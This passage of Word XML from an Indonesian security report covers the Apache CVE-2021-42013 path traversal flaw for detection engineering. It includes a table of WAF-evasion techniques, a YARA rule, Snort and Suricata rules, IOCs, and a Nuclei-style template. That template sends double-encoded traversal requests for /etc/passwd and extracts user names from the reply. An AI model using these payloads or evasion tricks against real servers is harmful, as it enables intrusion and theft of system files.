        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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7E69" wp14:textId="1D885CD4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User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Agent Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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2022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Menggunakan UA browser umum untuk menyamarkan tool otomatis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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694E" wp14:textId="2A23751D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Behavioral analysis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pola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request yang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tidak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natural</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="6DDE706F" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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6702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IP Rotation via VPN/Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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4900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Mengganti IP source setiap beberapa request untuk menghindari rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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9D7B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Korelasi lintas IP; payload similarity detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="0EDC1803" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9FF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Payload Variation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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76E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Menggunakan jumlah traversal yang berbeda (%65 count varies)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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A1E5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Regex pattern matching yang fleksibel di WAF/IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="18A09DE3" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9628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Mixed Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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2AF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Kombinasikan double dan single encoding dalam satu payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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4A46" wp14:textId="4D3647C4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Multi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pass URL decoder di WAF rule engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="5C65EA40" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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33D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Slow Request (Low &amp; Slow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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F25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Kirim request dengan delay untuk menghindari rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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E561" wp14:textId="0309EBC5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Time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based behavioral baseline analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="1C461A48" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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40C3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Fragmented Requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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C63B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Kirim payload dalam beberapa request yang kecil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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7A6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Session correlation dan request reconstruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="6E84EFAA" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A796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Case Variation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="37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263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%%32%65 vs %%32%45 (huruf besar vs kecil untuk 'E')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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7AAA" wp14:textId="54B9F4DB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Case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insensitive URL normalization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sebelum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matching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="66204FF1" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="37E2B2A2" wp14:textId="2F2F7D71">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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 xml:space="preserve">16. Detection Engineering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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> YARA Rules</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1E4CD689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16.1 YARA Rule untuk Deteksi Log Apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4F3FFE9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/*</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="37F5F21B" wp14:textId="2F17FE4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* YARA Rule: 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42013 Apache Path Traversal Detection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="11C676A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* Author   : pwn0sec Security Research</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1EE4ED4C" wp14:textId="4BFE79C0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* Date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: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2024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07</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6BE20AF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* Target   : Apache access.log / error.log</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="766900A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*/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="66978A9C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760515FC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rule CVE_2021_42013_PathTraversal {</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7815059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meta:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6A217121" wp14:textId="27BD845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description = "Detects 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42013 double URL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encoded path traversal"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="07C7896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author      = "pwn0sec"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="43C9C2C8" wp14:textId="0FE2B4FA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date        = "2024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01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07"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="68D097B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severity    = "critical"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0DAE7BAD" wp14:textId="2FB665F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cve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= "CVE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42013"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1FF822AC" wp14:textId="79D6B52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reference   = "https://nvd.nist.gov/vuln/detail/CVE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42013"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F8FFF1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5696A5F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strings:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5485B5B3" wp14:textId="043000F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// Double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encoded dot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dot pattern</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="35E6396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$dbl_enc_1  = "%%32%65" ascii nocase</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0FA5DFB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$dbl_enc_2  = "%%32%45" ascii nocase  // uppercase E variant</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="336B16C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5479533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// Sensitive file targets</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="74602B6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$target_1   = "/etc/passwd" ascii</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="333F7AD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$target_2   = "/etc/shadow" ascii</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0AB155E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$target_3   = "/bin/sh"    ascii</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="644699E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$target_4   = "/bin/bash"  ascii</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6853DBF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$target_5   = "/.ssh/"     ascii</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="597B45D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4066E51F" wp14:textId="1833129C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// Single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encoded variant (CVE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41773)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="44C9B5E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$sgl_enc_1  = ".%2e/" ascii nocase</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7D44DB5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$sgl_enc_2  = "%2e./" ascii nocase</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="364188C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$sgl_enc_3  = "%2e%2e/" ascii nocase</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="582CCBB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66AFC3C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condition:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62BEA9B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(($dbl_enc_1 or $dbl_enc_2) and any of ($target_1, $target_2, $target_3, $target_4, $target_5))</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="17C118B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or</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="525A70D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(($sgl_enc_1 or $sgl_enc_2 or $sgl_enc_3) and any of ($target_1, $target_2, $target_3, $target_4, $target_5))</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4286D95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}</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2DBF0D7D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="026CF4B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info:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7784A087" wp14:textId="69182B21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name: Apache HTTP Server 2.4.50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Path Traversal &amp; RCE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1FEF8C25" wp14:textId="580721B2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author: pwn0sec</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F28C30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severity: critical</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7CF2483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description: |</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="312CB685" wp14:textId="5343BF1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Apache HTTP Server 2.4.50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gagal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memperbaiki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41773.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="43CC27F0" wp14:textId="52D4E07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Double URL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encoding bypass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normalisasi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,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memungkinkan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path</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2D5B83A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traversal dan RCE jika mod_cgi aktif.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="37AA676C" wp14:textId="4925455C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tags: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apache,cve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,cve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2021,path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traversal,rce</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="51174E9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reference:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="18182F15" wp14:textId="53EEB6E0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https://nvd.nist.gov/vuln/detail/CVE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42013</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4E9E1593" wp14:textId="0660012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cvss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metrics: CVSS:3.1/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AV:N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AC:L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PR:N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UI:N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S:U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/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0D32033A" wp14:textId="5EB2B97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cvss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score: 9.8</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="339FCE4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6A7421C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requests:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1E93CA87" wp14:textId="1C0A5F31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method: GET</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F1B7226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path:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="49CEF347" wp14:textId="0C56AFDA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'{{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BaseURL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}}/icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/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etc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/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="00D26A67" wp14:textId="3F56ECF5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'{{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BaseURL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}}/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cgi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bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/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etc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/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="520DFC3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unsafe: true</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="75F42400" wp14:textId="5304CF8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matchers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condition: and</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="538A9E57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matchers:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="46DBA365" wp14:textId="30450DA1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type: regex</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="187879A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regex:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3FCADC74" wp14:textId="3F24012C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'root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:.*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:0:0:'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0B77C0C0" wp14:textId="76D0439C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'(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daemon|bin|sys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):.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*:/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sbin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nologin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'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4B952EF9" wp14:textId="44CE7BD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type: status</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5C130676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status:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="73CBA300" wp14:textId="5E9E1654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200</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3F01C5F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extractors:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="387CDEF3" wp14:textId="1BC24E7B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type: regex</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6E19CAB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name: users</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="71038C6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regex:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="08764E8E" wp14:textId="0EFFADE0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    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'([a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z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_][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z0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9_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]*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):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x:[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9]+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:[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0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9]+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:.*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:/bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6B62F1B3" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="08965824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16.3 Snort / Suricata IDS Rule</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="49EE930F" wp14:textId="60ECA46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# Snort Rule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42013 Detection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4F8233FD" wp14:textId="595F55E8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alert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tcp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any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any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&gt; $HTTP_SERVERS [80,8080,443,8443] (</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7B252F18" wp14:textId="51DD5D3B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msg:"CVE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42013 Apache HTTP Server Double URL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Encoded Path Traversal";</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5007545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flow:established,to_server;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4E0F291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content:"%%32%65"; http_uri; nocase;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5D35182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pcre:"/%%32%65%%32%65/Ui";</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2185F9B1" wp14:textId="4B8A22D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classtype:web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application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attack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;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="508BD23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sid:9000001;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="225EB76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rev:1;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="59AB85EA" wp14:textId="70588E88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reference:cve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,2021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42013;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0B7AA68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metadata:affected_product Apache_HTTP_Server, attack_target Web_Server,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0488FE2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         deployment Perimeter, severity Critical;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2CEAEE8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)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="56156A7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6AFD3AA9" wp14:textId="6CD4D83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# Suricata Rule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RCE Detection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="558C5839" wp14:textId="006A7CEF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alert http any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any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&gt; $HTTP_SERVERS any (</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5AB83393" wp14:textId="610A40C1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msg:"CVE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42013 Apache RCE via /bin/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sh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";</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2C20A58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flow:established,to_server;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6559E213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http.method; content:"POST";</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6754CB5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http.uri; content:"bin/sh"; nocase;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0BA0D4F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http.uri; content:"%%32%65"; nocase;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4FA61EFE" wp14:textId="1C6CD2B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classtype:attempted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admin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;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="27DB760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sid:9000002;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6EF46BD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rev:1;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="47337C0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)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02F2C34E" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="11CE9D15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16.4 Indicators of Compromise (IOC)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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="6BD7D271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0980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Tipe IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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7991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Nilai / Pattern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4E13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Keterangan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="6E9906CD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DCD2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URL Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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5DF0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/icons/%%32%65%%32%65/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C29F" wp14:textId="3EC92E1F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Double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encoded traversal via icons endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="2370D742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0C9A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URL Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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E323" wp14:textId="6E5AB3B6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/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cgi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bin/%%32%65%%32%65/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5838" wp14:textId="3804E021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Double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encoded traversal via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cgi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bin endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="7C328747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4EDB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HTTP Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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E837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POST + URI contains /bin/sh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A827" wp14:textId="28091123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RCE attempt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POST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ke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shell binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="52173E5A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51AE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Response Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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FDF9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root:x:0:0:root:/root:/bin/bash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58A32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Indikasi /etc/passwd berhasil dibaca</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="7DDD9CD5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24E0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Log Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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1C43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"GET /icons/%%32%65 HTTP 200"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B84D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Traversal berhasil di access.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="55B540B3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E83B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CPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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6190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cpe:/a:apache:http_server:2.4.50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BD89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Versi Apache yang rentan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="51C5EB66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369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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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1782" wp14:textId="7F32FB92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CVE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2021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>42013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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2707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Identifier resmi kerentanan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="680A4E5D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4FB23DD9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17. Impact Analysis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="71D240FA" wp14:textId="0341C8C3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17.1 CIA Triad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Dampak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Komprehensif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600"/>
        <w:gridCol w:w="2560"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3C490D5F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3B1D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Aspek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FD6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w="3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2F3D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Dampak Langsung</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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BB9B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Potensi Dampak Lanjutan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
